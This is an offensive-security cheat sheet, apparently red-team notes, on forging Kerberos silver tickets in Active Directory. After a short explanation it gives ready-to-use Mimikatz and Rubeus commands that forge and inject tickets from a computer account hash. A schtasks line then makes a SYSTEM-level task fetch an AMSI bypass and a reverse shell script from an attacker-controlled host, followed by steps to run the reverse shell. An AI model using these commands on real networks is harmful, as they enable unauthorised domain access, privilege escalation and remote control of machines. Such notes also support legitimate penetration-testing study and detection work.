Silver ticket is a valid TGS ticket.
Encrypted and Signed by the NTLM hash of the service account (or computer account) of the service running with that account.
Services rarely check PAC (Privileged Attribute Certificate).
Services will allow access only to the services themselves (you get a TGS valid only for the indicated computer/service).
Reasonable persistence period (default 30 days for computer accounts)
Attack starts at step 5 (AP_REQ):
We can create the TGS ourselves directly since we have the hash of the service account/computer account.
Using hash of the Domain Controller computer account, below command provides access to shares on the Domain Controller:
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain sid> /target:<FQDN computer target> /service:<serviceclass> /rc4:<hash of computer$> /user:Administrator /ptt"'
.\\RubeusNew.exe silver /service:"<serviceclass>/<FQDN computer target>" /rc4:"<hash of computer$>" /user:"administrator" /domain:"<domain>" /sid:"<domain sid>" /ptt
Create a silver ticket for the HOST SPN which will allow us to schedule a task on the target (we need also an HTTP SPN ticket to use Powershell Remoting):
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain sid> /target:<FQDN computer target> /service:<serviceclass> /rc4:<hash of computer$> /user:Administrator /ptt"'
Schedule the task (works without disable defender):
schtasks /create /S <FQDN computer target> /SC Weekly /RU "NT Authority\\SYSTEM" /TN "TaskName" /TR "powershell.exe -c 'iex(iwr -UseBasicParsing <http://ip.of.attacker.machine>:port/amsibypass.txt); iex(iwr -UseBasicParsing <http://ip.of.attacker.machine>:port/Invoke-PowerShellTcpEx.ps1)'"
Modify the Invoke-PowerShellTcpEx.ps1 with your IP/Port :
Run the reverse shell: